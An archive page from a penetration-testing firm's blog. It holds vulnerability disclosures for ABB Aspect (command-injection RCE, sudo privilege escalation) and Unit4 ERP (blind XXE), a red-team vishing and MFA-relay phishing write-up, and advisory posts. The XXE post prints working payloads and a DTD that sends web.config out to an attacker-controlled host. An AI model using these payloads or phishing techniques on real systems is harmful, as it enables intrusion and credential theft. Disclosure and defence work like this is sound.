Blog Posts Archives - Page 4 of 5

Privilege Escalation and RCE Vulnerabilities for Multiple ABB Appliances [ASPECT, Matrix, Nexus]. (CVE-2023-0635 / CVE-2023-0636)

Posted on 5th June 2023 by Prism Infosec

Prism Infosec recently identified two high risk vulnerabilities within the ABB Aspect Control Engine affecting versions prior to 3.07.01. The two vulnerabilities discovered could result in remote code execution (RCE), and privilege escalation within ABB’s Aspect Control Engine software.

Background

During a recent security testing engagement, Prism Infosec discovered an ABB Aspect Appliance through traditional enumeration techniques. A Google search revealed that this is a building management control system and this instance it was misconfigured to be publicly available to the Internet.

Typically, administrative interfaces should not be externally accessible over the Internet unless absolutely necessary. Where this is unavoidable, they should require a secondary layer of authentication such as VPN Access, IP address whitelisting with further controls such as Multi-factor Authentication (MFA).

Prism Infosec gained initial access to the admin interface by using the default credentials documented in the Aspect Control Engine’s publicly available user manual.

Exploitation

Following this access, Prism Infosec were able to identify that the Network Diagnostic function of the ASPECT Appliance was vulnerable to Remote Code Execution, which allowed us to gain access via a reverse-shell to the underlying Linux Operating System and associated internal network infrastructure.

CVE-2023-0636 – Remote code execution

The vulnerability here was possible due to the fact that the ping host functionality allowed for the appending of Linux commands to an IP address.

Because of this it was possible to host a shell file from Prism Infosec’s internal testing server and serve it to this web server’s htmlroot directory.

This PHP shell file allowed for remote connectivity to the ASPECT-Enterprise Application’s underlying system.

CVE-2023-0635 – Escalating from apache user to root.

After further investigation, Prism Infosec identified an unintended privilege escalation vulnerability, built into the underlying OS of the ABB Appliance. This then allowed the user to escalate to a root account.

Once initial access was achieved, a check against the privileges revealed that the software was running as the ‘apache’ user, a relatively low-level user with limited functionality.

By using sudo -l it is possible to list what sudo permissions this low-level user has, take note of the /usr/local/aam/bin/* entry here at the bottom of the (root) NOPASSWD: section. A script was identified within this directory was called: copyFile.sh.

Root access achieved

Because this directory did not require a password to be called as root, it was possible to copy /bin/bash into here, and sudo /usr/local/aam/bin/bash which allowed Prism Infosec to escalate to a root account.

The possibilities here are endless for an adversary, from exfiltrating local data, to enumerating and moving laterally through the internal network.

To summarise, Prism Infosec went from an external IP address open to the internet, to a rooted Linux system, inside an internal network.

Resolution

Prism Infosec quickly made our client aware of these vulnerabilities and disclosed to ABB the findings within their software shortly after. We were delighted to see both parties quickly acknowledging and acting on these issues, from the client ensuring these levels of access were disabled and ABB to patching and releasing an update and advisory to their clients.

Credits and References

CVE-2023-0635 – Privilege escalation to root was discovered by George C
CVE-2023-0636 – Remote code execution was discovered by Karolis N

CVE-2023-0635 Privilege escalation to root
The successful attacker can open a shell and escalate access privileges to root.

CVSS v3.1 Base Score: 7.8
CVSS v3.1 Temporal Score: 7.4
https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:W/RC:C
CVSS v3.1 Vector:
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:W/RC:C
NVD Summary Link: https://nvd.nist.gov/vuln/detail/CVE-2023-0635

CVE-2023-0636 Remote code execution
The successful attacker is able to leverage a vulnerable network diagnostic component of the ASPECT interface, to perform Remote Code Execution.

CVSS v3.1 Base Score: 7.2
CVSS v3.1 Temporal Score: 7.0
https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:F/RC:C

CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:F/RC:C
NVD Summary Link: https://nvd.nist.gov/vuln/detail/CVE-2023-0636

Timeline

Vulnerabilities discovered during the assessment: [05/10/2022]
Vendor Informed: [07/10/2022]
First Meeting with ABB and Prism Infosec: [11/10/2022]
Final Meeting with ABB and Prism Infosec: [22/05/2023]
Vendor Confirmed Fix, and communicated to customers: [01/06/2023]
CVE Assigned: [05/06/2023]
Prism Infosec Blog Post: [05/06/2023]

How to Protect the Business Against a Data Breach/Ransomware

Posted on 16th January 2023 by Prism Infosec

Threats to the business can come in various forms but by far the most common and significant is a data breach. Usually leveraged via a successful phishing or spear phishing attack, this then results in either sensitive information (such as a username and/or password) being disclosed or a compromise of target endpoints such as laptops or mobile devices

Both attack vectors could then see unauthorised remote logins to organisational services or data, which an attacker can then use to exfiltrate sensitive information. This could include personal data (names, addresses, dates of birth, medical data et al), banking details, credit card information, or company intellectual property.

The information will then either be sold (usually at a price per record), used to target other individuals with fraudulent attacks, or be associated with a ransomware situation where either it may then be permanently encrypted and/or released publicly if the attackers do not receive payment within a certain time. Over the last few years, it’s this latter scenario that has come to dominate, as organised criminal gangs become more adept at extorting funds from targets.

Are you prepared?

Yet, despite the dearth of data breaches reported year after year, organisations still fail to prepare for what is rapidly becoming almost inevitable. If the business isn’t ready, it can’t respond effectively or communicate with internal and external stakeholders such as customers and clients, C-Suite and third-party organisations such as the ICO. This results in a loss of confidence and unwanted publicity, as well as the organisation spending unnecessary time resolving incidents effectively and the potential financial loss of paying the ransom.

To protect themselves from such attacks, organisations should implement a variety of defences. It’s important to deliver regular security awareness programs to staff, warning of the risk of clicking on unknown links or opening files or attachments, for instance, but these need to be regularly scheduled and be appropriate. The most effective security awareness briefings will be relatively succinct and interesting to staff, for example by containing relevant and interesting examples of the potential impacts, rather than being a lecture.

With regards to technical security controls, the business should implement endpoint and cloud-based protection which can protect against known and new attacks and as well as monitoring and alerting systems to facilitate rapid identification and reporting of any potential attempts and actual breaches within the business environment. Also, put in place strong endpoint configuration that limits the privileges of users, restricts the execution of unknown and untrusted applications and reduces the attack surface through reduction of unnecessary functionality (Command Prompts, Powershell, default bundled software etc).

Locking down data is essential so ensure that data storage is resilient to unauthorised attempts to modify files, using techniques such as inherent versioning and/or offline data snapshots and backups. Remain vigilant through the implementation of monitoring and alerting mechanisms across server, endpoint and cloud environments and keep things fresh through regular security reviews of device endpoints and data storage and applications to test their resilience to ransomware attacks.

If the worst does happen, you’ll want to rely on an effective incident response plan being in place as well as team preparedness, having conducted scenario-based penetration testing (“red team”) attack simulations as well as desktop simulated breach exercises to ensure that the security teams know how to handle breaches quickly and effectively.

Policy and process

However, it cannot be overstated how important it is to have a reasonable and applicable (to the business) set of security policies, procedures and plans to support information security and to govern user behaviour.

An overarching information security policy should put security centre stage and reveal the management commitment to it as well as prescribing a framework of other documents such as an acceptable use policy, incident response plan, access control and data handling policies. Many organisations are now already aligned or certified to standards such as ISO27001, which provides a framework for management of an information security management system (ISMS).

Be Proactive

Finally, be proactive. Regularly review the data that is being collected and stored by the organisation, whether on-premise or in the cloud, assess its importance to the business and ensure that there are suitable controls in place to protect it from exposures and loss. Ensure that offline backups, snapshots, and/or data versioning exist and consider the impact of data being deleted, encrypted or leaked. Regularly advise your staff on existing and new cyber security threats, and consider future and evolving attacks such as voice/messaging attacks, as detection of email based phishing attacks forces attackers to seek alternative avenues.

CVE-2022-34001 – XML External Entity (XXE) in Unit 4 ERP 7.9 (Also Known As “Agresso”)

Posted on 19th July 2022 by Prism Infosec

Prism Infosec Identified an XXE vulnerability within Unit4’s Enterprise Resource Planning (ERP) software. This has been assigned CVE-2022-34001. Unit4’s ERP software is a well-known enterprise management suite, which includes financial and project management tools.

Prism Infosec discovered a blind XXE within a specific function of the ERP software. This would allow an authenticated attacker to read arbitrary files from the host server.

CVE-2022-34001 – Proof of Concept

The ERP API supported the use of SOAP calls; Curiously, the ‘ExecuteServerProcessAsynchronously’ SOAP call allowed the insertion of arbitrary XML within its body. To test for XXE, Prism used a simple HTTP outbound call to a Burp Collaborator server to confirm that the XML allowed for entity expansion, and also allowed the SYSTEM call.

The following request shows a snippet of the ‘ExecuteServerProcessAsynchronously’ SOAP call with the embedded XXE payload within XML tags:

POST /BusinessWorld-webservicestest/service.svc HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: http://REDACTED/ImportService/ImportV200606/ExecuteServerProcessAsynchronously User-Agent: PostmanRuntime/7.29.0 Accept: */* Host: api-services.redacted.com Accept-Encoding: gzip, deflate Connection: close Content-Length: 743 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ExecuteServerProcessAsynchronously xmlns="http://REDACTED/ImportService/ImportV200606"> <input> <ServerProcessId>GL07</ServerProcessId> <MenuId>BI88</MenuId> </Variant> <Xml> <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://burp_collaborator.com"> %dtd;]><xxx/>]]> </Xml> </input> <credentials> …[REDACTED]… </credentials>

This resulted in an HTTP request to the Prism Infosec controlled server:

The request was received from IP address [REDACTED] at 2022-Mar-01 11:24:45 UTC. GET / HTTP/1.1 Host: burp_collaborator.com

Connection: Keep-Alive

This confirms that entity expansion was enabled, along with being able to leverage protocols such as HTTP and FILE. As SOAP request only responded with an error message, this attack was considered ‘blind’ – so out of band techniques were required to exfiltrate data from the host.

On an attacker-controlled server, the following malicious DTD file was hosted (test.xml):

<!ENTITY % start "<[CDATA["> <!ENTITY % end "]]>"> <!ENTITY % outfile SYSTEM "file:///E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config"> <!ENTITY % goout "<!ENTITY % pop SYSTEM 'http://attacker_controlled_server:8000/%start;%outfile; %end;'>">

The SOAP call was then initiated but referencing the malicious DTD along with the parameter entities to exfiltrate the data:

POST /BusinessWorld-webservicestest/service.svc HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: http://REDACTED/ImportService/ImportV200606/ExecuteServerProcessAsynchronously User-Agent: PostmanRuntime/7.29.0 Accept: */* Host: api-services.redacted.com Accept-Encoding: gzip, deflate Connection: close Content-Length: 743 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ExecuteServerProcessAsynchronously xmlns="http://REDACTED/ImportService/ImportV200606"> <input> <ServerProcessId>GL07</ServerProcessId> <MenuId>BI88</MenuId> <Variant>104</Variant> <Xml> <![CDATA[ <!DOCTYPE doc[ <!ENTITY % dtd SYSTEM "http://attacker_controlled_server:8000/test.xml"> %dtd; %goout; %pop; ]> ]]> </Xml> </input> --[Cut]--

On the attacker controlled server, a listener was set up to serve the malicious DTD, and also catch the contents of the file being read:

Serving HTTP on 0.0.0.0 port 8000 ... api-services_ip - - [02/Mar/2022 12:54:16] "GET /test.xml HTTP/1.1" 200 - api-services_ip - - [02/Mar/2022 12:54:04] "GET /%3C[CDATA[%0D%0A%3C!--%0D%0A%20%20For%20more%20information%20on%20how%20to%20configure%20your%20ASP.NET%20application,

%20please%20visit%20%0D%0A%20%20http://go.microsoft.com/fwlink/?LinkId=301879%0D%0A%20%20--%3E%0D%0A%3Cconfiguration%3E%0D%0A%20%20%3CconfigSections

--[Cut]--

The decoded data reveals the content of the “E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config” file on the api-services host:

/<[CDATA[  <configuration> <configSections> <section name="agresso.web.api" type="Agresso.Web.Http.Configuration.WebApi.WebApiConfigurationSection, Agresso.Web.Http" /> </configSections> --[Cut]—

The XXE could also be leveraged to make Server-Side Request Forgery (SSRF) calls within the internal network; mapping out the internal network, and making arbitrary requests to any internal hosts.

Prism Infosec contacted the vendor (Unit 4); and supplied all the necessary information so that Unit 4 could confirm and subsequently remediate the vulnerability. Unit 4 responded in a timely matter and started working on a fix for all customers.

Although the test was completed on the latest version of Unit 4 ERP, we have been advised that previous versions of the software may also be affected.

Note: Prism Infosec did not confirm if the vulnerability had been patched; No further testing was conducted after the initial engagement.

Timeline – CVE-2022-34001

Discovered by Prism Infosec during an engagement for client: March 1^st 2022
Vendor Informed: March 17^th 2022
CVE Assigned: June 19^th 2022
Vendor Confirmed Fix, and communicated to customers: July 7^th 2022
Prism Infosec Blog Post: July 19^th 2022

Vulnerability was discovered and written by Alexis Vanden Eijnde of Prism Infosec.

What is the PSTI and will it improve IoT security?

Posted on 16th May 2022 by Prism Infosec

By Phil Robinson

The new Product Security and Telecommunications Infrastructure (PSTI) Bill currently going through parliament comprises two parts. The first aims to put in place safeguards to regulate the secure design of the Internet of Things (IoT) while the second will ensure broadband and 5G networks are gigabit-grade. It’s the first part that has caused a stir because it will, for the first time, see the introduction of enforceable regulation.

Applicable to consumer products such as smartphones, connected cameras, TVs and speakers, fitness trackers, toys, white goods such as smart washing machines and fridges and home equipment such as smoke detectors and door locks, home automation and alarm systems, the regulations stipulate that manufacturers must:

Not use default passwords
Have a vulnerability disclosure policy
Be open about the length of time the product will be supported with security updates

Yet, while the move to regulate the IoT is regarded as long overdue, the PSTI has been criticised for not going far enough, particularly given the number of well-documented security vulnerabilities exhibited by smart technology.

Why is the IoT so insecure?

The root cause of the majority of issues that have plagued consumer hardware is that manufacturers are cost driven and aim to be quick to markets and in many cases this had led to shortcuts or a complete lack of information security during the design process. This has resulted in common security weaknesses long since addressed in more mature software and hardware products, such as default usernames and passwords or straightforward password bypasses, weak encryption (hashes) for password storage and a lack of encryption for data transfer across open networks for administrative traffic, being widely used in the IoT.

In addition, the sector has suffered from other issues. such as a lack of security around the firmware update processes (such as a lack of signing) and also hardware interface exposures that allow for straightforward access to low level functions of the device or its components (such as memory). And whereas it was hoped the sector would self-regulate, this doesn’t seem to have happened, with a report by the Internet of Things Security Foundation in 2020 finding that only 1 in 5 manufacturers had a disclosure process, meaning the majority could not be alerted to a security vulnerability.

Where does the PSTI fall short?

The bill currently addresses the most significant and easily exploitable weaknesses in IoT devices: the use of default passwords, however many other common security weaknesses have not been covered at this stage. That said, the use of default passwords is by far the most common way that an IoT device will be compromised and it is a significant first step in improving the security of these products.

Focusing on default settings is also easy to establish whether the manufacturer is in breach of the bill, whereas other measures (such as ensuring a stringent code review process to identify access control bypasses or input validation weaknesses) will not be so straightforward to ascertain.

The bill also does not stipulate a minimum support period for security updates for consumers, thus manufacturers can still release products without a commitment to supporting it, leaving this decision in the hands of consumers who may not necessarily understand the risks.

Understandably perhaps, its not being retroactively deployed so won’t apply to the army of devices currently out there, and while manufacturers must have a disclosure channel, there’s no compunction or timeframe for them to notify their users of any reported vulnerability. Nor is there any focus on the patch management: users often find these difficult to implement so some move towards over-the-air or automated patching would have been welcome.

As mentioned above, there are many other vulnerabilities that can be used to exploit IoT devices, including disrupting administrative traffic, identifying and exploiting flaws in web or file transfer services running on the device, causing denial of service, interfering with the update process and deploying rogue firmware or exploiting the devices with physical access.

So is the PSTI too little too late?

The PSTI is still winding its way through parliament and is unlikely to pass into law until 2023 but when it marks an important first step in the regulation of an industry that has previously been seen as playing fast and loose. It will force IoT product vendors around the world to consider the security associated with their consumer devices and will provide a baseline of protection for devices being sold to the public in the UK. And it will also see offending vendors held to account for the first time if they do not abide by the articles of this law.

It’s important to remember that while the bill doesn’t cover as many of the security issues one might have hoped, it does cover the vulnerability with the highest likelihood and impact of exploitation. Other key requirements such as ensuring a vulnerability disclosure policy and ensuring transparent advice on the time that security updates will be released are also welcome measures and support the improvement of product security over time.

Knowing how long a product will be supported will help consumers make an informed decision and is likely to be used by consumer support organisations such as Which? To differentiate offerings. In many ways, it sets a bar by which vendors can be measured and could lead to the emergence of consumer kitemarks so that security becomes not a sunk cost but a differentiating factor that manufacturers can use to boost sales.

IoT devices do, of course, also impact the corporate environment either because users seek to use these on the network or by acting as potential conduits for an attack, such as ransomware or the large scale DDoS attacks we saw carried out by the Mirai botnet that enslaved thousands of IoT devices. Consequently, the PSTI will affect businesses too and, depending on how the regulation evolves, it could even have a direct impact on security team workloads, particularly if it seeks to address patch management in the future.

Let’s Go Phishing

Posted on 17th January 2022 by Prism Infosec

Kian J recounts a recent simulated phishing engagement delivered to a major financial organisation

We recently completed a project for a major financial organisation which saw us deliver a red team engagement covering three scenarios. The first involved a simulated phishing attack and we thought it worth sharing the procedures used by our consultants to gain complete, persistent, unauthorised access to the company’s internal network.

Before we embarked upon the exercise, we needed to assess the requirements of the phishing campaign and pick a campaign profile that was a best fit for the use case. Examples of possible attacks included:

Email Phishing
URL/HTTPs Phishing
Spear Phishing
Whale Phishing
Vishing
Smishing
Angler Phishing
Pharming
Clone Phishing

Note: this is not a complete list of attacks, but only a handful that would be considered in a remote phishing engagement.

Due to the engagement requirements, we had decided that the best approach would be a multi-pronged campaign, consisting of vishing, email phishing and URL phishing.

Initially, we used email, however, it quickly became apparent that users had been trained in this area, resulting in burnt accounts which we were able to diagnose due to a high bounce back rate on our emails. Despite running the assault over a couple of days with various attack vectors, it all led to the same result – with our account or domain being blacklisted.

At this stage the natural conclusion would have been to assume that the staff had received adequate training in phishing engagements. However, we decided to give it one last shot using a vishing campaign conducted using URL phishing.

We continued with our OSINT efforts, specifically scraping phone numbers from various sites such as rocketreach.io and lusha.com to put together a new target list. Ideally, we wanted this new list to consist of higher value targets such as developers or technical leadership roles. The purpose of this was that once we landed in the environment, we would hopefully have more privileges enabling us to escalate access. This resulted in a target list consisting of 31 phone numbers.The next step we needed to take was to get the staff to either visit a malicious site or to give us their username, password, and MFA token over the phone. We figured the first solution would have a better outcome (this is where the URL phishing comes into play). So, we went through the endpoints we had access to and decided that we would clone a Citrix site, and had created the following page:

Citrix Login — Citrix Gateway Login Screen

The page, after submitting credentials would then ask for a MFA token:

Great, now we had a target list and a malicious site (hosted in AWS to bypass any proxy filtering) and so were primed and ready to begin the vishing attack.

On our first call we managed to get a hold of someone I will refer to as “Mark”. We than ran through a simple script with him, explaining that we were swapping over Citrix environments and needed to test the database changeover had worked.

Mark was a great help throughout the assessment, but specifically on this call, he gave us a vital piece of information; the Citrix authentication was being handled by Microsoft single-sign-on (SSO) and that the page wasn’t sending him the SMS. We quickly got another consultant on the case to process the request (by submitting the credentials into their legitimate site) which would then force the SMS process to kick off.

We then called Mark back and, as we were already friendly with him, went through the same process. Mark then submitted the newly generated MFA token, an example of the output of which can be seen here:

Phished Credentials — Receiving the Credentials from our Target

Mark was then forwarded straight to their legitimate landing page, and it appeared as though sign-in was successful; this was caused by their time-out periods being overly long.

Perfect! So now we had Mark’s username, password, and an MFA token, but if we wanted to access the Citrix environment consistently, we would need multiple tokens. As it worked out, we had an easy solution to bypass this: the Microsoft Authentication application. We proceeded to log in to the app with Marks details:

Authenticator Screen — Microsoft Authenticator App

This then reflected on the website, adding two new options to the user:

Login Screen with Auth Options — The login then allowed use of the Authenticator

The two new options, “Approve a request on my Microsoft Authentication app” and “Use a verification code from my mobile app” were now the only indicators that the user had been compromised, however this did not lead to the campaign being discovered.

Finally, after a week of attempts, we had established a means of gaining complete, persistent, unauthorised access to the company’s internal network. From this point, we were then able to compromise another two accounts, totaling three before we decided that it was no longer going to provide us with an advantage and disclosing to the client.

In conclusion, we think there are two key recommendations not just for the company concerned but for anyone else who thinks they’ve covered the bases when it comes to phishing attacks. Firstly, we would advise that staff are trained in different forms of phishing attacks, such as email attacks and vocal attacks. Staff can quickly let their guard down when different channels are used. Secondly, we would also advise that any unmanaged devices are blocked, or at least have heavy restrictions placed upon them.

If you’d like to talk to us about how we can help test your resilience to a phishing attack, do contact us at contact@prisminfosec.com or call us on 01242 652 100.

ICO data reveals sharp rise in attacks

Posted on 14th January 2022 by Prism Infosec

Recent data from the Information Commissioner’s Office (ICO) Data Security Trends Analysis Q1 2021-22 (capturing incidents for the period 1 April – 30 June 2021) reveal there’s been a sharp rise in specific cyber attacks as attackers seek to capitalise on the disruption caused by the pandemic and working from home (WFH).

The biggest leap was in misconfigurations of software and hardware, up a staggering 543% from 7 incidents last year to 45. This reflects the rapid expansion within the cloud as businesses sought to roll-out remote working to enable WFH. Misconfigurations routinely top the list of cloud security issues due to a failure to configure cloud solutions. Left in their default settings, these systems become much easier to compromise when exploits then surface.

There was also a marked increase in attacks against the user. Malware was up a third and phishing attacks were up 54% compared to the same time last year while ransomware more than doubled due to the growth of Ransomware-as-a-Service (RaaS). RaaS enables cyber criminals to use malware for extortion without the need to code it themselves and was responsible for two thirds of all campaigns during 2020.

This year also saw the ICO also include cryptographic flaws and denial of service attacks which were omitted last year, indicating a growth in highly targeted organised attacks. The only attack type to buck the trend was unauthorised access which fell 28% from 87 to 63, but this could equally be due to the difficulty of detecting such an attack outside the corporate network.

The results show that many users have fallen victim to attack while WFH, let down by insufficient support and a failure to implement secure remote access. Staff training should have helped prevent phishing attacks, for instance, with virtual training sessions offered to help with reinforcement. The increase in malware also suggests inadequate protection of endpoints, no doubt caused by many relying on connecting from home on personal devices.

The ICO also helpfully breaks down these figures into specific sectors, and virtually all of them have seen an increase in incidents. The retail and manufacturing industries continue to suffer the highest volume of attacks but saw a relatively modest increase of 48% compared to some of the others.

Perhaps not surprisingly given the disruption to normal working practices, it was the General Business sector that saw the greatest rise at 282%, closely followed by the Utilities sector at 250% and the Health sector at 238%. The Legal sector and Transport and Leisure both saw a tail-off in demand for their services during the pandemic but an uptick following the easing of lockdown, resulting in attacks increasing by 117% and 106%, respectively.

A sector that was relatively unscathed by the pandemic and able to maintain BAU was Online Technology and Telecoms. It saw an increase of only 14%, revealing that it was better able to defend its operations. Similarly, the Finance sector saw only a 2% increase and Local Government 6% while those operating in Social Care actually saw an 11% decrease in attacks.

The results of the Data Security Trends Analysis 2021-22 suggest that many organisations struggled to put in place adequate security measures and adapt quickly enough to meet the demands for WFH. This then made it difficult to enforce security policies, leaving staff exposed.

The question that now remains is how effectively these sectors can play catch-up. Given that we will have a hybrid workforce for the foreseeable future, its vital that organisations now identify where their security gaps lie. Most sectors have some work to do to better protect their infrastructure, data and staff.

Our recommendations are to:

Focus on your users by improving identity and access management. Provide remote staff training so that they know how to connect securely. Use refresher training to remind staff of best practice for password management and how to avoid phishing and malware attacks.
Examine how you monitor remote devices and BYOD. Many security solutions are not designed to monitor endpoint devices and third-party connections so you may need to re-evaluate how you carry out remote network monitoring.
Address cloud security as a priority, particularly the configuration of cloud solutions, and ensure that you these down to the minimum requirements.
Put in place procedures to thwart brute force attempts such as 2FA, limit log-ins and failed log-in attempts and prevent root user access.
Adjust your Incident Response to ensure everyone knows what to do in the event of an attack. Check your Disaster Recovery plans to ensure you have back-ups and can perform effective remediation.

If you’d like some advice on how to make your business more resilient and your staff more secure, or if you’d like to assess how effective your current security measures are, we’re here to help. Email us at contact@prisminfosec.com or call 01242 652 100.

Threats and priorities for 2022

Posted on 23rd December 2021 by Prism Infosec

Phil Robinson, December 23rd 2021

Many businesses will still be grappling with the seismic shifts of the pandemic as they eye 2022. The rush to roll-out systems to support home working and to activate virtual versions of real-world business channels saw unprecedented digital transformation equivalent to years achieved in just a few months. But this rapid expansion came at a cost, leaving systems and networks overly exposed.

We’re already seeing the manifestation of more attacks, with the World Economic Forum reporting a 50.1% increase in cyber attacks due to the pandemic with 30,000 related to COVID-19 as well as huge spikes in phishing and ransomware. This has caused many organisations to task their security teams with retroactively fixing any security gaps.

Our top three issues to address going into 2022 and beyond include:

Cloud misconfiguration

Research claims 90% of businesses are now susceptible to attack due to misconfiguration so businesses need to identify and assess how well configured cloud systems are to enforce access restrictions, overly permissive storage policies, clamp down on compliance, apply least privilege and practice credential hygiene, and look at virtual network functions. At the same time, they can’t afford to stand still and need to continue to expand their cloud presence to remain competitive, so will need to focus on how they can continue to build-out in the cloud but in a more resilient fashion.

2. Ransomware and phishing

Ransomware-as-a-service or RaaS gaining ground, synonymous with groups such as DarkSide, Babuk and Cuba. These attacks typically involve the installation of malware which comes about by employees installing new software or through the security team failing to lock-down admin privileges.

Phishing can vary, from scatter gun email phishing, to targeted spear phishing, or text based attacks known as “smishing” . These attacks usually involve the attacker emailing or co-ercing an employee to execute a malicious file or visit a website to provide their credentials. This then allows the attacker to establish a command-and-control (C&C) server connection within the environment to establish a further foothold and attempt to escalate privileges. A recent example is the texts and emails offering an NHS pass/certificate for travel purposes with a request for payment (even though these are legitimately available for free via the NHS app).

Regularly educating users on how to spot phishing attacks and not to click on suspicious links or execute unknown attachments is imperative and you can make this relevant by running a test to see how many do fall foul of a staged attack.

When it comes to the user device, businesses need to protect user workstations with anti-virus and EDR (Endpoint Detection and Response) solutions and to prevent the execution of unknown files or scripts as well as ensuring that all Operating Systems and applications are kept up to date.

You can also stop a lot of this from getting through in the first place by blocking unnecessary file attachments at the email gateway or cloud solution (e.g. macro files, htm/html files, executable files/scripts) and marking inbound email as ‘EXTERNAL’. But you also need a failsafe so that in a worst-case scenario you’re prepared so ensure offline backups/snapshots are being made of critical data and regularly test that these can be restored.

3. Abuse of collaboration tools

We expect to see increased attempts to copy common notifications sent from business services such as Office 365 (e.g. sharing and encryption emails). Attackers could start utilising alternatives to email to attempt to deliver payloads and this could include messaging systems such as Teams. Additionally, there will be more attempts to exploit open file sharing mechanisms such as Onedrive and Sharepoint sites that allow guest access, which is more common than you might think.

If you’d like help with attack mitigation or remediation, cloud configuration or advice on how to make remote working more secure, email us at contact@prisminfosec.com or call 01242 652 100 for a one-to-one consultation.

Alexis V elected to CREST-EU Council

Posted on 7th December 2021 by Prism Infosec

We’re proud to announce that Alexis V, Senior Security Consultant at Prism Infosec, has been elected to the newly formed CREST-EU Council.

CREST, an international not-for-profit accreditation and certification body that represents and supports the technical information security market, announced its intention to form the Council and an EU Chapter at the end of October. Due to meet in the new year, the council will represent its international members in the European Union and will work to “ensure greater alignment with European initiatives”.

CREST has been restructuring since 2006 by carrying out democratic elections to form country and regional councils. These councils will feed into a single International Council which will include representation from each region. These representations will enable its members to shape and influence CREST’s strategic initiatives as well as the global cyber security market at large.

Alexis was elected to one of just ten seats on the EU Council. With over ten years’ experience of working in the UK cyber security space, he has played a crucial role at Prism Infosec over the course of the past year by establishing our office in Belgium. He currently delivers a range of penetration testing services to clientele, assists with securing sales through scoping projects, and implements our training programme to help upskill members of the team.

Commenting on his election, Alexis said: “I’m passionate about security and encouraging and supporting others to start their cyber security journey or develop their career. Growing the Belgian office by attracting new talent, getting involved in local initiatives and developing the team has been hugely rewarding and has allowed me to draw upon my previous experience delivering Advanced Web Application Testing training at BlackhHat USA. Going forward, I hope to replicate and improve upon some of the work we’ve done in the UK cyber security sector within the EU.”

Under his remit on the EU Council, Alexis hopes to be able to bridge the gap between the suppliers and consumers of security services and would like to ensure suppliers receive a consistent quality of service from within the industry which he believes can be achieved through reproducible methodologies.

Responding to the news, Phil Robinson, Founder and Principal Consultant at Prism Infosec, said: “Alexis has such enthusiasm, knowledge and drive that I’m not at all surprised by his election. He continues to be a real asset to the Prism Infosec team and has been instrumental in our expansion and the setting up of our office in Belgium. He’s also represented the company on numerous speaking engagements where he has sought to increase awareness about new techniques and attack vectors and to promote industry best practice so he will be in his element and able to offer a unique perspective when he takes his seat on the EU Council”.

Was the NSA’s Cyber Security director right to say attackers know networks best?

Posted on 6th December 2021 by Prism Infosec

By Phil Robinson

There was an interesting spat on Twitter during September when Rob Joyce, Cyber Security Director of the National Security Agency, disputed the notion put forward by security researcher @RayRedacted that “Defenders think in lists, attackers think in graphs”. (Presumably suggesting that defenders are preoccupied with tick lists and compliance while attackers are looking at the data to see where performance discrepancies and chinks in the armour lie). Joyce’s retort was that…

“Attackers put in the time to know the network and the devices better than the defenders. That’s how they win.”

His statement suggests that far from being just opportunists, attackers study the network and carefully craft their attacks. Time is on their side, which allows them to explore and reverse engineer at their leisure. And the implication is that, if their knowledge of the network outpaces your own, they capture the castle.

But is this really true? I’d argue that there are plenty of organisations that have a strong understanding of their IT estate and a decent awareness of their environment. They may even have implemented robust defences that have met or exceeded industry best practice across their technology stacks. They know every inch of their network and what’s running over it but this doesn’t guarantee they won’t be compromised.

What’s really happening

Security breaches occur due to a number of reasons. These can range from a lack of coverage (OS and app patching), competence (configuration weaknesses), staff awareness (password insecurity), budget (holes in defence technology), or just plain bad luck (exploiting windows of opportunity) – so it’s not just a matter of good situational awareness.

The National Cyber Security Centre (NCSC) makes the distinction that the majority of attacks are stil not targeted. Some adopt a more scatter gun approach, such as phishing, water holing, ransomware and scanning, and these by far outnumber the more time intensive targeted attacks, with 27% of businesses being attacked once a week and 83% of these suffering phishing attacks according to the Cyber Security Breaches Survey 2021 by the DDCMS.

There’s a good reason for this. Targeted attacks can take months of preparation and execution. The attacker will typically profile your business and probe the network for weaknesses to exploit using the oft quoted cyber kill chain approach. “Attacker time” tends to preoccupy the industry, which is why you’ll hear a lot about Mean Time to Detect (MTTD) and Mean Time to Respond (MTTR), which are terms used to hawk security solutions. But the truth is you need people and process – not just technology – to keep one step ahead of the attacker.

What can you do?

There is no single solution or tool that can be deployed to protect against the possibility of a security breach, however, if the organisation uses a variety of proactive approaches it can reduce the likelihood of being caught unawares. Here is my top 5 list of “common sense” practices that can be used to protect an organisation and reduce the possibility of compromise..

Staff/User Awareness – regular security awareness training which covers the dangers of common attacks (phishing / spear phishing etc) and educates on what to look for and how to report them quickly. Implement a “no blame” culture and encourage reports. What you don’t want are people covering their tracks for fear of reprisals from management.

Device Security – ensure that devices (such as workstations and servers but also mobile devices and other networking hardware) are configured to be as secure as possible, with users having a low level of privilege, effective Anti-Virus (AV) and/or Endpoint Detection and Response (EDR) software deployed. Remove unnecessary software, follow best practice guides on hardening (e.g. NCSC and CIS) and limit execution of unknown executables and scripts (e.g. Microsoft Defender Application Control).

Centralised Management – wherever possible use a centralised security management solutions (such as Mobile Device Management, centralised AV/EDR consoles and centralised patch management tools) to view and manage the estate. Do not leave the security of AV reports, patching, et al to the individual user/workstation level. This may seem like an expensive route – but solutions exist within cloud subscription fees (e.g. Microsoft 365 and Google Workspace)

Logging and Event Reporting – in the absence of a SOC or SIEM solution, wherever logs and events can be enabled across the technology stack, make sure these are set-up and tuned. Ensure coverage at firewall, network device (switch/router), workstations, servers, applications and cloud services. Ensure that logging is not overwhelming to prevent alert fatigue and that key events are prioritised (e.g. multiple password failures, AV/EDR alerts, unexpected privilege escalation)

